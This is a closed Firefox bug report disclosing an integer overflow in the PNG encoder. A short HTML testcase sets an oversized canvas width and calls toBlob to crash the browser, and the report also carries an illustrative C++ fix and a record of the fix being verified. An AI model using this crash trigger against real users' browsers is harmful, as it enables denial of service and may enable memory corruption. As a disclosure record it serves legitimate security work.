Bug 1294662 (Closed)
heap-buffer-overflow in nsPNGEncoder::AddImageFrame
Opened 8 years ago, closed 8 years ago
Categories: Core :: Graphics: Canvas2D, defect
Status: RESOLVED DUPLICATE of bug 1294677
Tracking: firefox51: affected
People: Reporter: nils, Assigned: milan
Keywords: csectype-bounds, sec-critical
Attachments (1 file): 204 bytes, text/html
An integer overflow vulnerability exists in nsPNGEncoder::AddImageFrame which results in a too small allocation, resulting in a buffer overflow:

    nsPNGEncoder.cpp:282:
    UniquePtr<uint8_t[]> row = MakeUnique<uint8_t[]>(aWidth * 4);

Similar constructs exist in the other encoders as well, even though I wasn't able to trigger a crash. e.g.:
http://searchfox.org/mozilla-central/source/image/encoders/bmp/nsBMPEncoder.cpp#191
http://searchfox.org/mozilla-central/source/image/encoders/jpeg/nsJPEGEncoder.cpp#172

The testcase crashes the latest 64-bit ASAN build of Firefox as follows:

crash.html:

    <script>
    c=document.createElement('canvas');
    c.setAttribute('width',1073741831);
    c.setAttribute('height', 1);
    //c['mozGetAsFile'](undefined,14);
    c.toBlob(alert, "image/png");
    </script>

Both mozGetAsFile and toBlob work. toBlob triggers the crash in a separate thread.
I was also able to trigger a similar bug in the BMP encoder. See https://bugzilla.mozilla.org/show_bug.cgi?id=1294677
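As an added illustration (not code from this report or from Firefox), the arithmetic behind the under-allocation and a checked form of the same row-size computation; the function names WrappingRowBytes, CheckedRowBytes, ConvertHostARGBRow and EncodeRow are hypothetical stand-ins for the encoder's row sizing and row conversion, and the pixel values are constructed.

```cpp
#include <cstdint>
#include <cstdio>
#include <vector>

// Hypothetical re-creation of the defective size computation described in the
// report: aWidth * 4 evaluated in 32-bit unsigned arithmetic, which silently
// wraps for any width >= 0x40000000 (1073741824).
uint32_t WrappingRowBytes(uint32_t aWidth) {
    return aWidth * 4u;  // 1073741831 * 4 == 2^32 + 28, so the result is 28
}

// Hardened form: check before multiplying and report failure instead of handing
// a wrapped size to the allocator. Same idea as a checked-integer wrapper; this
// is an illustration, not the project's actual patch.
bool CheckedRowBytes(uint32_t aWidth, uint32_t* aOut) {
    const uint32_t kBytesPerPixel = 4;
    if (aWidth == 0 || aWidth > UINT32_MAX / kBytesPerPixel) {
        return false;  // product would not fit in uint32_t
    }
    *aOut = aWidth * kBytesPerPixel;
    return true;
}

// Converts one row of host-order ARGB pixels to RGBA bytes, writing exactly
// aWidth * 4 bytes into aDst. A buffer sized with WrappingRowBytes for a huge
// aWidth would be overrun here, which is the kind of write ASAN flagged.
void ConvertHostARGBRow(const uint32_t* aSrc, uint8_t* aDst, uint32_t aWidth) {
    for (uint32_t i = 0; i < aWidth; ++i) {
        uint32_t px = aSrc[i];
        aDst[i * 4 + 0] = static_cast<uint8_t>(px >> 16);  // R
        aDst[i * 4 + 1] = static_cast<uint8_t>(px >> 8);   // G
        aDst[i * 4 + 2] = static_cast<uint8_t>(px);        // B
        aDst[i * 4 + 3] = static_cast<uint8_t>(px >> 24);  // A
    }
}

// Allocates the row buffer only when the size computation is sound; an empty
// vector signals that the row was refused rather than under-allocated.
std::vector<uint8_t> EncodeRow(const std::vector<uint32_t>& aPixels) {
    uint32_t rowBytes = 0;
    uint32_t width = static_cast<uint32_t>(aPixels.size());
    if (!CheckedRowBytes(width, &rowBytes)) {
        return {};
    }
    std::vector<uint8_t> row(rowBytes);
    ConvertHostARGBRow(aPixels.data(), row.data(), width);
    return row;
}

int main() {
    const uint32_t kReportWidth = 1073741831u;  // width from crash.html
    uint32_t checked = 0;
    std::printf("wrapping size: %u bytes\n", WrappingRowBytes(kReportWidth));
    std::printf("checked size accepted: %s\n",
                CheckedRowBytes(kReportWidth, &checked) ? "yes" : "no");
    std::vector<uint8_t> row = EncodeRow({0x80112233u});  // constructed pixel
    std::printf("1-pixel row is %zu bytes\n", row.size());
    return 0;
}
```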
Updated•8 years ago
Group: core-security → gfx-core-security
Updated•8 years ago
Keywords: csectype-bounds, sec-high
Updated•8 years ago
Keywords: sec-high → sec-critical
Comment 3•8 years ago
Assigning Milan since he assigned himself to the BMP one.
Assignee: nobody → milan
Comment 4•8 years ago
(In reply to Daniel Veditz [:dveditz] from comment #3)
> Assigning Milan since he assigned himself to the BMP one.

Thanks. It's fixed by the same patch as bug 1294677.
Updated•8 years ago
Depends on: CVE-2016-5278
Comment 5•8 years ago
Nils, bug 1294677 is about to land. Once it lands, can you confirm that it fixes this manifestation?
Comment 7•8 years ago
I wasn't able to test this with an ASAN build as the tinderbox mozilla-central ASAN builds seem to be broken for a while now ... However, this issue did crash a non-ASAN build before the fix, and I can confirm that the latest build does not crash anymore.
Flags: needinfo?(nils)
Comment 8•8 years ago
(In reply to Nils from comment #7)
> I wasn't able to test this with an ASAN build as the tinderbox
> mozilla-central ASAN builds seem to be broken for a while now ...

They're not "broken." They're no longer maintained. ASAN builds have been made by Task Cluster for a while. Our Release Engineering team changed the process. This was sent out to my team by Decoder:

Manual browsing:
1. Go to https://tools.taskcluster.net/index/artifacts/#gecko.v2.mozilla-central.latest.firefox/gecko.v2.mozilla-central.latest.firefox.linux64-asan-opt
2. On the right side, you will see the most recent build (the browser is in "public/build/target.tar.bz2").

Automated downloading:
There is a JSON API for accessing the index and the artifacts of a task, so you would have to:
1. Fetch https://index.taskcluster.net/v1/task/gecko.v2.mozilla-central.latest.firefox.linux64-asan-opt
2. Extract the taskId from the response.
3. Fetch https://queue.taskcluster.net/v1/task/<TASKID>/artifacts (replace <TASKID> with the id from the previous response).
4. Extract the list of desired files and fetch them by appending them to the previous URL, e.g. the browser will be at: https://queue.taskcluster.net/v1/task/<TASKID>/artifacts/public/build/target.tar.bz2
Flags: needinfo?(nils)
Comment 10•8 years ago
Nils, I still need to know if this reproduces per comment 5 or if it is fixed.
Flags: needinfo?(nils)
Comment 11•8 years ago
I can confirm that this does not reproduce on a recent ASAN build as well.
Flags: needinfo?(nils)
Updated•8 years ago
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → DUPLICATE
Updated•8 years ago
Flags: sec-bounty?
Updated•8 years ago
Flags: sec-bounty? → sec-bounty-
Updated•5 years ago
Group: gfx-core-security